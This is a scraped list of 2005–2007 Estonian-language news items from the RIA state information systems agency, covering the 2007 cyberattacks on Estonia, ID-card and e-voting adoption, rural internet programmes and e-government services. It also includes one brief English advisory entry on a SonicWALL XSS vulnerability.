https://ria.ee/uudised/laane-viru-maavalitsus-asub-iske-t-juurutama
CERT Eesti kohtub Soome ametivendadega
2007-06-13T21:00:00Z | 1181768400

Täna ja homme kohtuvad Eesti ja Soome küberrünnete vastu võitlejad, et üheskoos analüüsida hiljutist küberrünnete lainet.

https://ria.ee/uudised/cert-eesti-kohtub-soome-ametivendadega
Kaks kolmandikku eestlastest kasutab internetti
2007-06-11T21:00:00Z | 1181595600

TNS Emori uuringu kohaselt kasutab internetti 65 protsenti Eesti 6–74-aastastest elanikest ehk 768 000 inimest.

https://ria.ee/uudised/kaks-kolmandikku-eestlastest-kasutab-internetti
RIA jätkab Euroopa Liidu struktuurivahendite rakendusüksusena
2007-06-07T21:00:00Z | 1181250000

Riigi Infosüsteemide Arenduskeskus täidab rakendusüksuse ülesannet ka Euroopa Liidu struktuurivahendite rakendamisperioodil 2007–2013. Seda kinnitab Rahandusministeeriumi poolt 3. aprillist kuni 23. maini 2007. aastal läbi viidud vastavusaudit.

https://ria.ee/uudised/ria-jatkab-euroopa-liidu-struktuurivahendite-rakendusuksusena
Ettevalmistused IT-projektide toetamiseks perioodil 2007–2013
2007-06-04T21:00:00Z | 1180990800

Alates 2007. aastast algab uus 7-aastane struktuurivahendite programmperiood, mis toob kaasa uuendusi struktuurivahendite kasutamise reeglistiku osas. Perioodil 2007–2013 suunatakse Eestisse kokku 53,2 miljardit krooni, millest 1 miljard toetab IT arendamist.

https://ria.ee/uudised/ettevalmistused-it-projektide-toetamiseks-perioodil-2007-2013
ID-kaardi e-kasutajate arv on aastaga enam kui kahekordistunud
2007-05-22T21:00:00Z | 1179867600

Aastaga on ID-kaardi elektrooniliste funktsioonide – isikutuvastuse ja digiallkirjastamise – kasutajate arv suurenenud enam kui kaks korda, kasvades enam kui 30 000 inimese võrra. Täna kasutab ID-kaarti elektrooniliselt ca 60 000 inimest, sealhulgas on digiallkirja andnud üle 57 000 inimese. Maikuu alguses turule jõudnud Mobiil-ID-d kasutab juba ligi 600 inimest.

https://ria.ee/uudised/id-kaardi-e-kasutajate-arv-aastaga-enam-kui-kahekordistunud
X-tee päringute portaal ja Kodanikuportaal saavad ühise näo
2007-05-20T21:00:00Z | 1179694800

X-tee päringute portaal ning Kodanikuportaal on visuaalselt kaks erinevat keskkonda ühise eesmärgiga – pakkuda koondatult kodanikele võimalust kasutada erinevaid e-teenuseid. Selleks, et kaotada visuaalne ning osas ka tehniline erinevus nende kahe keskkonna vahel, on Riigi Infosüsteemide Arenduskeskus välja kuulutanud riigihankekonkursi.

https://ria.ee/uudised/x-tee-paringute-portaal-ja-kodanikuportaal-saavad-uhise-nao
Südaööks küberrünnete tase normaliseerus
2007-05-15T21:00:00Z | 1179262800

Kell 12.00. Südaööks vaibusid üksikud suuremad ründed nädalvahetuse tasemele. Samas näitavad toimunud intsidendid, et üksikuid sihilikke pahatahtlikke ründeid Eesti küberruumi vastu võidakse ette võtta veel pika aja jooksul.

https://ria.ee/uudised/sudaooks-kuberrunnete-tase-normaliseerus
Üksikud ründed on sagenenud
2007-05-14T21:00:00Z | 1179176400

Kell 16.42. Üksikud ründed Eesti veebiserverite vastu on täna võrreldes nädalavahetuse ja eilsega sagenenud.

https://ria.ee/uudised/uksikud-runded-sagenenud
Küberrünnete tulv on kontrolli all
2007-05-10T21:00:00Z | 1178830800

Reede hommikul vähenesid suuremahulised rünnakud Eesti küberruumi pihta, kuid väiksemamahulised ründed siiski jätkuvad.

https://ria.ee/uudised/kuberrunnete-tulv-kontrolli-all
Küberründed ei ole peale 9. maid vaibunud
2007-05-09T21:00:00Z | 1178744400

Kell 17.00. 8. mai hilisõhtul alanud rünnak on kestnud suuremahulisena kuni praeguseni. Täna on andnud rünnetest teada ka Hansapank. Hetkel ei prognoosi me rünnete olulist vaibumist ning valmistume ka võimalikuks pikaajalisemaks ründetõrjumistööks.

https://ria.ee/uudised/kuberrunded-ei-ole-peale-9-maid-vaibunud
Küberrünnakute eesmärgiks võib olla Eesti infoblokaad
2007-05-08T21:00:00Z | 1178658000

Teisipäeva, 8. mai hilisõhtul kell 23 algas suuremahuline küberrünnak, mis jätkub praeguseni. Rünnete põhilisteks sihtmärkideks on jätkuvalt valitsusasutuste veebilehed ja andmesidevõrgud.

https://ria.ee/uudised/kuberrunnakute-eesmargiks-voib-olla-eesti-infoblokaad
Arvutikaitse 2009 soovitused tavakasutajale arvuti turvalisuse tõstmiseks
2007-05-07T21:00:00Z | 1178571600

Viimastel nädalatel on Eesti servereid rünnatud peamiselt välismaalt. Seni on õnnestunud neid rünnakuid tõrjuda. Kuid eksisteerib ka võimalus, kus ründamiseks kasutataks ka Eesti võrgus asuvaid arvuteid, mille kasutajad enamasti ise ei teagi, et nende arvuti millegi niisugusega tegeleb.

https://ria.ee/uudised/arvutikaitse-2009-soovitused-tavakasutajale-arvuti-turvalisuse-tostmiseks
CERT Eesti: Rünnete tõrjumise muudab edukaks koostöö
2007-05-06T21:00:00Z | 1178485200

Eestit tabanud küberrünnete tõrjumist on tõhustanud koostöö üle maailma tegutsevate CERT organisatsioonidega ning Eesti õiguskaitseorganitega. Nädalavahetusel lahendati seeläbi mitu rünnet juba eos.

https://ria.ee/uudised/cert-eesti-runnete-torjumise-muudab-edukaks-koostoo
Andmesidevõrk püsib häkkerite huviorbiidis
2007-05-03T21:00:00Z | 1178226000

Kell 19.50. Ööl vastu reedet toimus taas sihilik DDos* küberrünnak Eesti valitusasutuste internetiliikluse ja veebiserverite vastu, mis tõrjuti koostöös internetiteenuse pakkujatega.

https://ria.ee/uudised/andmesidevork-pusib-hakkerite-huviorbiidis
Internetiliikluse maht on endiselt tavapärasest kõrgem
2007-05-02T21:00:00Z | 1178139600

Kell 16.00. Riigiasutuste andmesidevõrgus on liiklust täna ligikaudu kolm korda rohkem kui harilikul tööpäeval. Mitmete turvameetmete rakendamise ja võimsuste lisamisega on õnnestunud hoida andmesidevõrgu teenused käigus.

https://ria.ee/uudised/internetiliikluse-maht-endiselt-tavaparasest-korgem
CERT Eesti lühiinfo - hommik Eesti internetiruumis kulgeb harjumuspäraselt
2007-05-01T21:00:00Z | 1178053200

Kell 10.00. 1. mai õhtul kell 20, südaööl ja öösel kell üks tehti kolm tõsist rünnakut Eesti veebiliikluse vastu, kuid peale seda olukord normaliseerus.

https://ria.ee/uudised/cert-eesti-luhiinfo-hommik-eesti-internetiruumis-kulgeb-harjumusparaselt
Algas turvalise mobiil-ID teenuse pakkumine
2007-05-01T21:00:00Z | 1178053200

Kolmapäevast saavad EMT lepingulised kliendid kasutada teenust mobiil-ID, mille abil saab mobiiltelefoniga anda digiallkirju ja kasutada tuvastamist nõudvaid teenuseid, näiteks internetipanka.

https://ria.ee/uudised/algas-turvalise-mobiil-id-teenuse-pakkumine
CERT Eesti: Varahommikul kordistati rünnakuid Eesti küberruumi vastu
2007-04-30T21:00:00Z | 1177966800

Kell 14.00. 1. mai varahommikul kordistati rünnakuid Eesti küberruumi ja eelkõige valitsusasutuste veebi- ja nimeserverite vastu. Rünnete maht on järk-järgult kasvanud, kuid olukord on kontrolli all.

https://ria.ee/uudised/cert-eesti-varahommikul-kordistati-runnakuid-eesti-kuberruumi-vastu
CERT Eesti teatab: küberründed Eesti vastu ei ole vaibunud
2007-04-29T21:00:00Z | 1177880400

Kell 19.00. Eilse ja tänase päeva jooksul on jätkunud sihilikud rünnakud Eesti riigiasutuste veebiserverite töö tõkestamiseks ning on tehtud katseid kogu riigiasutuste andmesidevõrgu töö seiskamiseks. Valitsusasutuste kodulehekülgede kättesaamisel väljaspool Eestit on sellest tulevalt jätkuvalt tõrkeid. Eesti siseselt on koduleheküljed kättesaadavad ja internetiliiklus toimib suuremate probleemideta.

https://ria.ee/uudised/cert-eesti-teatab-kuberrunded-eesti-vastu-ei-ole-vaibunud
Pahatahtlikud küberründed Eesti vastu tulevad välismaalt
2007-04-28T21:00:00Z | 1177794000

CERT Eesti teadaanne kell 14.00: Hoolimata viimaste päevade pahatahtlikest rünnetest Eesti kodulehekülgede vastu, püsib Eesti sisene internetiliiklus ning võimalus külastada välismaiseid kodulehekülgi. Rünnetega võitlemiseks tuli aga piirata Eestist väljapoole jäävate kasutajate ligipääsu valitsusasutuste kodulehekülgedele.

https://ria.ee/uudised/pahatahtlikud-kuberrunded-eesti-vastu-tulevad-valismaalt
CERT Eesti kommentaar küberrünnakutele
2007-04-27T21:00:00Z | 1177707600

Kell 23.39. Reede, 27. aprilli õhtul alanud ning laupäeval jätkunud küberrünnakutes oli häiritud paljude Eesti riigisektori kodulehtede töö. Praeguseks on oluline osa riigi kodulehekülgi taas kättesaadavad. Rünnakute tõrjumiseks piirati Eestist väljapoole jäävate kasutajate ligipääsu rünnatavatele kodulehekülgedele.

https://ria.ee/uudised/cert-eesti-kommentaar-kuberrunnakutele
Arvutikaitse 2009 raames tulevad turule soodsad ID-kaardi lugejad sülearvutitele
2007-04-16T21:00:00Z | 1176757200

Vaata Maailma Sihtasutuse algatuse Arvutikaitse 2009 ja OMNIKEY koostöö raames jõuavad lähiajal müüki sisemised ID-kaardi lugejad sülearvutitele. Lugejate jaehind jääb eeldatavalt 400–500 krooni vahele, mis on võrreldes tänase turuhinnaga ca kaks korda odavam, hulgiostjatele on hind veelgi soodsam.

https://ria.ee/uudised/arvutikaitse-2009-raames-tulevad-turule-soodsad-id-kaardi-lugejad-sulearvutitele
Eesti infotehnoloogiamaade pingereas 20. kohal
2007-03-27T21:00:00Z | 1175029200

Esmaspäeval, 26. märtsil esitles Maailma Majandusfoorum (WEF) Genfis oma uut Globaalset Infotehnoloogiaraportit, mille kohaselt maailma juhtriik infotehnoloogia valdkonnas on nüüd Taani. Eesti on võrreldes eelmise aastaga tõusnud kolme koha võrra, olles nüüd 20. kohal. Kolmes eraldi kategoorias, sh online-teenuste kättesaadavuselt on Eesti aga 1. kohal.

https://ria.ee/uudised/eesti-infotehnoloogiamaade-pingereas-20-kohal
e-hääletusel osales üle 30 000 kodaniku
2007-02-28T22:00:00Z | 1172700000

Sel aastal esmakordselt avanenud võimalus anda Riigikogu valimistel oma hääl ID-kaardiga leidis arvukat kasutamist. Kolme päevaga tegi oma valiku elektrooniliselt üle 30 000 inimese.

https://ria.ee/uudised/e-haaletusel-osales-ule-30-000-kodaniku
Oma valimisjaoskonna teave eesti.ee-st
2007-02-22T22:00:00Z | 1172181600

Kodanikuportaalis eesti.ee on loodud teenus, mis võimaldab lihtsa vaevaga leida elukohajärgne valimisjaoskond.

https://ria.ee/uudised/oma-valimisjaoskonna-teave-eestiee-st
Elektroonilise maksustamishinna akti tellimine
2007-02-14T22:00:00Z | 1171490400

Tallinna Maa-amet avas X-tee teenuse elektroonilise maksustamishinna akti tellimiseks.

https://ria.ee/uudised/elektroonilise-maksustamishinna-akti-tellimine
6. veebruar on turvalise interneti päev
2007-02-04T22:00:00Z | 1170626400

6. veebruaril soovib Eesti ligi 40 riigi seas juhtida arvutite ja interneti kasutajate tähelepanu vajadusele olla internetis käitudes hoolas, pöörates erilist tähelepanu enda ja oma lähedaste turvalisusele küberruumis.

https://ria.ee/uudised/6-veebruar-turvalise-interneti-paev
E-valijakaardi tellis üle 7000 inimese
2007-02-01T22:00:00Z | 1170367200

Riigikogu valimisteks tellis elektroonilise valijakaardi 7022 inimest. Elektroonilise valijakaardi tellinud inimesed saavad koju saadetava paberkandjal valijakaardi asemel ametlikule e-posti aadressile (@eesti.ee) saadetud elektroonilise kaardi, mis annab teavet selle kohta, kus, kuidas ja millal saab valida.

https://ria.ee/uudised/e-valijakaardi-tellis-ule-7000-inimese
E-valijakaardi tellimiseks jääb kolm päeva
2007-01-28T22:00:00Z | 1170021600

Siseministeerium tuletab meelde, et elektroonilist valijakaarti Riigikogu valimisteks saab tellida veel kolm päeva, kuni 31. jaanuari õhtuni. Üle tuleks kontrollida ka rahvastikuregistrisse kantud elukohaandmed.

https://ria.ee/uudised/e-valijakaardi-tellimiseks-jaab-kolm-paeva
E-valijakaardi on tellinud üle 3600 inimese
2007-01-11T22:00:00Z | 1168552800

Alates 8. jaanuarist võttis siseministeerium koostöös Riigi Infosüsteemide Arenduskeskusega kasutusele elektroonilise valijakaardi. Esimese töönädala jooksul on Riigi Infosüsteemide Arenduskeskuse andmetel e-valijakaardi tellinud üle 3600 inimese ning teenuse kasutajaid lisandub pidevalt.

https://ria.ee/uudised/e-valijakaardi-tellinud-ule-3600-inimese
Telli e-valijakaart Kodanikuportaalist
2007-01-07T22:00:00Z | 1168207200

Esmaspäevast, 8. jaanuarist kuni 31. jaanuarini on kodanikel võimalus tellida Riigikogu valimisteks elektrooniline valijakaart ning loobuda paberil valijakaardi saamisest. Elektrooniline valijakaart saadetakse valija ametlikule e-posti aadressile (@eesti.ee).

https://ria.ee/uudised/telli-e-valijakaart-kodanikuportaalist
Vaata maailma toob Eestisse "Igaühe ID-kaardi lugeja"
2006-12-20T22:00:00Z | 1166652000

Vaata Maailma Sihtasutuse ja OMNIKEY vahel allkirjastatud raamleping toob Eesti arvutikasutajateni senisest kaks kuni kolm korda soodsamad ID-kaardi lugejad. Aastatel 2007–2009 jõuab Eestisse kuni 600 000 ID-kaardi lugejat, mille levitamises osalevad Eesti suurimad organisatsioonid.

https://ria.ee/uudised/vaata-maailma-toob-eestisse-igauhe-id-kaardi-lugeja
ID-kaardi elektroonilise kasutamise baaskoolitus
2006-12-13T22:00:00Z | 1166047200

Arvutikaitse 2009 algatuse raames loodud ID-kaardi elektroonilist kasutamist käsitlev baaskoolituse tervikmaterjal on kättesaadav aadressil koolitus.id.ee. Sealhulgas on koostatud materjalide pakett tööandjatele asutusesiseste koolituste läbiviimiseks.

https://ria.ee/uudised/id-kaardi-elektroonilise-kasutamise-baaskoolitus
Riigi Infosüsteemide Arenduskeskuse kommentaar seoses AS Televõrk uudisega
2006-12-11T22:00:00Z | 1165874400

Kommentaarina tänasele uudisele AS Televõrgu poolt pakutavast internetist tuleb öelda, et tehniliste ligipääsuvõimaluste avardamine ja osalusvõimaluste suurendamine on üks olulisi riigi tegevussuundi infoühiskonna arendamisel. Seetõttu on ka tehnoloogiate paljusus interneti levikuks kindlasti hea. AS Televõrk poolt pakutav tehnoloogiline lahendus aitab kindlasti kaasa interneti ligipääsuvõimaluste avardamisele, olles üks lisavõimalus interneti kasutamiseks.

https://ria.ee/uudised/riigi-infosusteemide-arenduskeskuse-kommentaar-seoses-televork-uudisega
Kliendiportaal e-PRIA põllumeestele avatud
2006-12-06T22:00:00Z | 1165442400

Alates tänasest on kõikidele põllumeestele avatud Põllumajanduse Registrite ja Informatsiooni Ameti (PRIA) kliendiportaal e-PRIA, mis muudab talupidajate ja tootjate suhtlemise PRIAga oluliselt kiiremaks ja mugavamaks.

https://ria.ee/uudised/kliendiportaal-e-pria-pollumeestele-avatud
CERT Eesti osaleb kooperatiivse küberkaitse projektis
2006-12-06T22:00:00Z | 1165442400

Kaitseministeeriumis tutvustati täna kooperatiivse küberkaitse projekti. Küberkaitse programmi eesmärk on Eesti infrastruktuuridele suunatud küberrünnakute analüüs ja klassifitseerimine ning erinevate rünnakute simuleerimine. See on vajalik informatsiooni kriitilise infrastruktuuri kaitsejuhtimiste loomiseni ja võimalike ohtude ja küberrünnakute tagajärgede likvideerimine riiklikus mastaabis.

https://ria.ee/uudised/cert-eesti-osaleb-kooperatiivse-kuberkaitse-projektis
60% ehk 730 000 Eesti 6–74-aastastest elanikest kasutab internetti
2006-12-05T22:00:00Z | 1165356000

Võrreldes eelmise aasta sügisega on internetikasutajad 35 000 inimese võrra rohkem. Iga kolmas 6–74-aastane eestimaalane kasutab internetti iga päev.

https://ria.ee/uudised/60-ehk-730-000-eesti-6-74-aastastest-elanikest-kasutab-internetti
Valitsus kiitis heaks "Infoühiskonna arengukava 2013"
2006-11-29T22:00:00Z | 1164837600

30. novembril valitsuses heaks kiidetud „Infoühiskonna Arengukava 2013” seab eesmärgiks tõsta inimeste elukvaliteeti ning kaasata neid enam ühiskondlikku ellu info- ja kommunikatsioonitehnoloogia (IKT) laialdase kasutuselevõtu kaudu. Muuhulgas nähakse ette kogu avaliku sektori asjaajamise muutmist paberivabaks.

https://ria.ee/uudised/valitsus-kiitis-heaks-infouhiskonna-arengukava-2013
Elektroonilist teadete saatmist riigilt kodanikule seadused ei piira
2006-11-27T22:00:00Z | 1164664800

Portaali „Eesti.ee” ühe komponendi – teavituskalendri – kasutuselevõtu raames viis RIA läbi õigusliku analüüsi hindamaks uue tehnoloogilise lahenduse kasutuselevõtu seaduslikkust.

https://ria.ee/uudised/elektroonilist-teadete-saatmist-riigilt-kodanikule-seadused-ei-piira
Eestis on väljastatud 1 miljon ID-kaarti
2006-10-09T21:00:00Z | 1160427600

Eestis väljastatud isikutunnistuste (ID-kaartide) arv on ületanud 1 miljoni piiri. Kehtiv ID-kaart on ligi 90% Eesti 15–74-aastastest elanikest.

https://ria.ee/uudised/eestis-valjastatud-1-miljon-id-kaarti
Kõrgkoolidesse sisseastumise infosüsteemi SAIS kaudu esitati 26 000 avaldust
2006-10-03T21:00:00Z | 1159909200

Tänavu said tudengikandidaadid esitada sisseastumisavalduse ilma kõrgkooli kohale minemata, sisseastumisinfosüsteemi SAIS kaudu esitati üle 26 tuhande avalduse ehk prognoositust kaks korda rohkem.

https://ria.ee/uudised/korgkoolidesse-sisseastumise-infosusteemi-sais-kaudu-esitati-26-000-avaldust
KülaTee 3 interneti levi Harjumaal läbis kontrolli
2006-09-10T21:00:00Z | 1157922000

Riigi Infosüsteemide Arenduskeskus koostöös Sideametiga teostas 5. ja 6. septembril Harjumaal andmeside kvaliteedi ja interneti kättesaadavuse ja parameetrite kontrollimiseks mõõdistamistöid programmi „KülaTee3” raames.

https://ria.ee/uudised/kulatee-3-interneti-levi-harjumaal-labis-kontrolli
Külatee 3 interneti levi Läänemaal läbis kontrolli
2006-09-06T21:00:00Z | 1157576400

Sideamet teostas 29. ja 30. augustil Läänemaal andmeside kvaliteedi ja interneti kättesaadavuse ning parameetrite kontrollimiseks mõõdistamistöid.

https://ria.ee/uudised/kulatee-3-interneti-levi-laanemaal-labis-kontrolli
Hiiumaal ja Muhu saarel WiMax levib
2006-08-27T21:00:00Z | 1156712400

Riigi Infosüsteemide Arenduskeskuse tellimusel teostas Sideamet 15. augustil Hiiumaal ja Muhu saarel andmeside kvaliteedi ja interneti kättesaadavuse ning parameetrite kontrollimiseks mõõdistamistöid.

https://ria.ee/uudised/hiiumaal-ja-muhu-saarel-wimax-levib
Haigekassa e-teenused tööandjatele kolivad X-tee ettevõtteportaali
2006-08-15T21:00:00Z | 1155675600

Esmaspäevast, 21. augustist on Eesti Haigekassa poolt tööandjatele pakutav ravikindlustuse määramise e-teenus kättesaadav X-tee teenusena. Haigekassa e-teeninduse klientide jaoks toimub üleminek automaatselt ühelt tehnoloogiliselt keskkonnalt teisele.

https://ria.ee/uudised/haigekassa-e-teenused-tooandjatele-kolivad-x-tee-ettevotteportaali
Järvamaa interneti levik läbis kontrolli
2006-07-05T21:00:00Z | 1152133200

Riigi Infosüsteemide Arenduskeskuse tellimusel teostas Sideamet 27. ja 28. juunil esimese maakonnana Järvamaal andmeside kvaliteedi ja interneti kättesaadavuse ja parameetrite kontrollimiseks mõõdistamistöid. Mõõtmisalasse oli valitud 32 erinevat küla Järvamaale ettenähtud leviala piires.

https://ria.ee/uudised/jarvamaa-interneti-levik-labis-kontrolli
Kodanikuportaalist hiireklikkidega ülikooli
2006-06-25T21:00:00Z | 1151269200

Paljudesse Eesti kõrgkoolidesse saab tänavu esmakordselt sisseastumisavaldusi esitada interneti teel uues ühtses www.sais.ee sisseastumise infosüsteemis või Kodanikuportaali vahendusel.

https://ria.ee/uudised/kodanikuportaalist-hiireklikkidega-ulikooli
"KülaTee3" maakondlike hangete korraldamine lõppenud
2006-06-21T21:00:00Z | 1150923600

Maapiirkondade internetiseerimisprogrammi „KülaTee 3” raames lõppes maakondlike hangete korraldamine. Programmis osales kolmteist maakonda. Viimasena lõppes internetiseerimise hanke korraldamine Pärnu maakonnas, kus interneti püsiühenduse teenust hakkab pakkuma Norby Telecom.

https://ria.ee/uudised/kulatee3-maakondlike-hangete-korraldamine-loppenud
Internetiseerimisprogramm näitab esimesi tulemusi
2006-05-21T21:00:00Z | 1148245200

Reedel, 26. mail avatakse maapiirkondade internetiseerimise programmi KülaTee 3 raames esimene WiMax-i saatja Järvamaal Väätsal, kus riigihanke käigus osutus edukaimaks pakkujaks Norby Telecom.

https://ria.ee/uudised/internetiseerimisprogramm-naitab-esimesi-tulemusi
CERT Eesti käivitamine tõhustab interneti turvalisust
2006-05-08T21:00:00Z | 1147122000

Täna tutvustati Riigi Infosüsteemide Arenduskeskuses käivitunud CERT Eesti tegevust. CERT Eesti käsitleb Eesti arvutivõrkudes toimuvaid turvaintsidente, teostab ennetavaid tegevusi nende ärahoidmiseks ning tõstab kasutajate turvateadlikkust. Ühe esimese tööna käsitleti eelmistel nädalatel internetipankade koodide kopeerimise juhtumit.

https://ria.ee/uudised/cert-eesti-kaivitamine-tohustab-interneti-turvalisust
RIA toetab ID-kaardi elektroonilisele kasutamisele suunatud projekti
2006-03-27T21:00:00Z | 1143493200

RIA toetab SEB Eesti Ühispanga projekti ID-kaardi elektrooniliseks kasutamiseks, mille käigus saavad kõik SEB Eesti Ühispanga kliendid soetada endale ID-kaardi lugeja turuhinnast umbes kolm korda odavamalt – seadme väljastamine maksab 100 krooni.

https://ria.ee/uudised/ria-toetab-id-kaardi-elektroonilisele-kasutamisele-suunatud-projekti
Ülemaailmne turvalise interneti päev
2006-02-05T22:00:00Z | 1139176800

7. veebruaril tähistatakse maailmas turvalise interneti päeva, mille raames toimuvate ürituste eesmärk on anda teavet interneti kasutamisega seonduvate eetiliste, õiguslike ning turvalisust puudutavate teemade kohta ning võimaldada huvilistel jagada oma kogemusi uute tehnoloogiate kasutamisel.

https://ria.ee/uudised/ulemaailmne-turvalise-interneti-paev
E-riigi sihiks on lihtne elu
2006-01-26T22:00:00Z | 1138312800

Täna, 27. jaanuaril Riigi Infosüsteemide Arenduskeskuses (RIA) toimunud pressikonverentsil sõnastati prioriteedid e-riigi edasiseks eduks. Riik panustab kasutajamugavusest lähtuvatele ja erinevaid ametkondi ühendavatele e-teenuste loomisele ning interneti kättesaadavuse tagamisele ka hõredalt asustatud Eesti piirkondades.

https://ria.ee/uudised/e-riigi-sihiks-lihtne-elu
Ilmunud on aastaraamat „Infotehnoloogia avalikus halduses 2005”
2006-01-05T22:00:00Z | 1136498400

Kümnenda numbrini jõudnud aastaraamat annab traditsiooniliselt ülevaate riigi IT arengutest ning sisaldab riigiasutuste IT-küsimustega tegelevate kontaktisikute andmeid.

https://ria.ee/uudised/ilmunud-aastaraamat-infotehnoloogia-avalikus-halduses-2005
Gümnaasiumi varemlõpetanud saavad riigieksamitele registreeruda Kodanikuportaalis
2006-01-03T22:00:00Z | 1136325600

Alates sellest aastast on võimalik nendel inimestel, kellel on juba omandatud keskharidus, kuid kes soovivad edasiõppimise eesmärgil sooritada riigieksameid, registreeruda eksamitele Kodanikuportaali www.eesti.ee vahendusel. Lisavõimalusena saavad teenuse kasutajad jälgida registreerumisavalduse staatust.

https://ria.ee/uudised/gumnaasiumi-varemlopetanud-saavad-riigieksamitele-registreeruda-kodanikuportaalis
Eesti mahukaima digitaliseerimise projekti käigus jõuavad kõik pereaktid arvutisse
2006-01-02T22:00:00Z | 1136239200

3. jaanuaril alustas AS Andmevara Siseministeeriumi tellimusel arhiivsete pereaktide paberilt arvutisse viimist ehk digitaliseerimist, mis on oma ulatuselt suurim digitaliseerimise projekt Eestis.

https://ria.ee/uudised/eesti-mahukaima-digitaliseerimise-projekti-kaigus-jouavad-koik-pereaktid-arvutisse
Presshouse OÜ ostab ajakirja "Arvutimaailm"
2005-12-04T22:00:00Z | 1133733600

Seni Riigi Infosüsteemide Arenduskeskuse (RIA) poolt välja antav Eesti vanim tehnoloogiaajakiri „Arvutimaailm” müüdi Presshouse OÜ-le. Uued omanikud hakkavad ajakirja välja andma alates 2006. aastast.

https://ria.ee/uudised/presshouse-ou-ostab-ajakirja-arvutimaailm
Järvamaa internetiseerimiseks alustatakse läbirääkimisi
2005-11-24T22:00:00Z | 1132869600

Maapiirkondade internetiseerimise programmi „KülaTee3” raames alustab Riigi Infosüsteemide Arenduskeskus (RIA) läbirääkimisi Järvamaa lairibaühenduse rajamise ostmiseks AS Norby Telecomi ning Elion Ettevõtted AS-ga.

https://ria.ee/uudised/jarvamaa-internetiseerimiseks-alustatakse-labiraakimisi
Minister Rummo ja Riigi Infosüsteemide Arenduskeskus tutvustavad loodavat lapsehoiuteenuste infosüsteemi
2005-11-03T22:00:00Z | 1131055200

Esmaspäeval, 7. novembril kell 13.00 tutvustatakse Vabariigi Valitsuse pressiruumis Rahukohtu 3 loodavat lapsehoiuteenuste infosüsteemi.

https://ria.ee/uudised/minister-rummo-ja-riigi-infosusteemide-arenduskeskus-tutvustavad-loodavat-lapsehoiuteenuste
Valimisjaoskondade info jõudis Kodanikuportaalis veebikaardile
2005-09-29T21:00:00Z | 1128027600

Kodanikuportaali www.eesti.ee lisandunud rubriik "Valimisteave" võimaldab kodanikul vaadata valimisjaoskonna asukohta veebikaardil ning valimisjaoskonna andmeid. Aluseks on sealjuures võetud isiku registreeritud aadressi andmed Rahvastikuregistris. Lahenduse eesmärgiks on muuta valimisteabe saamine elektroonilises keskkonnas hõlpsamaks.

https://ria.ee/uudised/valimisjaoskondade-info-joudis-kodanikuportaalis-veebikaardile
Riigiasutuste e-teenuste arendus saab 123 miljonit krooni toetust
2005-09-06T21:00:00Z | 1126040400

Eesti riik ja Euroopa Regionaalarengu Fond (ERDF) toetavad järgneva kolme aasta jooksul Eesti infoühiskonna arengut 122 539 365 miljonit krooniga. Eraldatava rahasumma toetusel arendatakse jõudsalt edasi erinevaid e-teenuseid, mis muudavad kodaniku suhtlemise riigiga lihtsamaks ning mugavamaks.

https://ria.ee/uudised/riigiasutuste-e-teenuste-arendus-saab-123-miljonit-krooni-toetust
Õpingutega seotud info on Kodanikuportaali vahendusel kõigile kättesaadav
2005-09-01T21:00:00Z | 1125608400

Kodanikuportaali www.eesti.ee vahendusel on uudse teenusena kättesaadavad Eesti Hariduse Infosüsteemi (EHIS) õpilaste ja üliõpilaste registri teenused. Registrist saavad õpilased ja üliõpilased jälgida õppimisega seotud infot Eesti õppeasutustes.

https://ria.ee/uudised/opingutega-seotud-info-kodanikuportaali-vahendusel-koigile-kattesaadav
Ametlik @eesti.ee e-posti süsteem pakub teenuseid nüüd ka ettevõtjatele
2005-08-03T21:00:00Z | 1123102800

Nüüdsest on igal Äriregistris registreeritud juriidilisel isikul olemas ametlik e-posti aadress kujul registrikood@eesti.ee ja ettevõtte.nimi@eesti.ee. Seni on ametlik e-posti aadress isikukood@eesti.ee olemas igal isikukoodi omaval Eesti elanikul, lisaks saavad ID-kaardi omanikud koos kaardiga ka aadressi eesnimi.perenimi@eesti.ee.

https://ria.ee/uudised/ametlik-eestiee-e-posti-susteem-pakub-teenuseid-nuud-ka-ettevotjatele
Gümnaasiumilõpetajad saavad Kodanikuportaalis tutvuda oma riigieksamite tulemustega
2005-05-29T21:00:00Z | 1117400400

Ka sellel aastal on kõigil gümnaasiumilõpetajatel võimalik kodanikuportaali www.eesti.ee kaudu tutvuda oma riigieksamitulemustega. Eksamite tulemused ilmuvad portaali sedamööda, kuidas jõutakse tööd parandada ning punkte andmebaasi sisestada.

https://ria.ee/uudised/gumnaasiumilopetajad-saavad-kodanikuportaalis-tutvuda-oma-riigieksamite-tulemustega
SonicWALL SOHO Web Interface Multiple Remote Input Validation Vulnerabilities
2005-05-02T04:00:00Z | 1115006400

Multiple cross-site scripting (XSS) vulnerabilities in SonicWALL SOHO 5.1.7.0 allow remote attackers to inject arbitrary web script or HTML via (1) the URL or (2) the user login name, which is not filtered when the administrator views the log file. CVE: CVE-2005-1006 Last updated: July 11, 2017, 1:32 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2005-0001
Riigi infosüsteemi keskse infrastruktuuri teenuste kontseptsioon
2005-04-19T21:00:00Z | 1113944400

Seoses Vabariigi Valitsuse määrusega nr 273 12. augustist 2004 kehtestatud infosüsteemide turvameetmete süsteemi (ISKE) rakendamisega tekib paljude andmekogude puhul vajadus tõsta serveriruumide ning andmetöötlejate töökohtade füüsilist turvalisust, parandada arvutivõrkude kaitset tulemüüride ja spetsiifilisemate rünnete avastamise vahendite abil, täiustada andmete varundamist jne.

https://ria.ee/uudised/riigi-infosusteemi-keskse-infrastruktuuri-teenuste-kontseptsioon
Majandustegevuse registri taotlusi saab esitada elektrooniliselt
2005-02-20T22:00:00Z | 1108936800

Hiljemalt 15. aprilliks peab ettevõtja esitama kinnituse registreeringu õigsuse kohta majandustegevuse registris (MTR). Nüüdsest saab registreerimistaotlusi esitada ja andmete õigsust kinnitada ka elektrooniliselt X-tee vahendusel.

https://ria.ee/uudised/majandustegevuse-registri-taotlusi-saab-esitada-elektrooniliselt
Elektroonilise dokumendihalduse arendamise projekt
2005-01-26T22:00:00Z | 1106776800

Majandus- ja Kommunikatsiooniministeerium käivitas 10. jaanuarist 2005 elektroonilise dokumendihalduse arendamise projekti, mille eesmärgiks on luua ministeeriumi ja tema valitsemisala asutusi hõlmav ühtne dokumendihalduse süsteem ning hankida kõiki valitsemisala tööprotsesse toetav uus terviklik dokumendihalduse tarkvara.

https://ria.ee/uudised/elektroonilise-dokumendihalduse-arendamise-projekt
Ametliku eesti.ee aadressi saab nüüd ka kujul eesnimi.perenimi@eesti.ee
2005-01-25T22:00:00Z | 1106690400

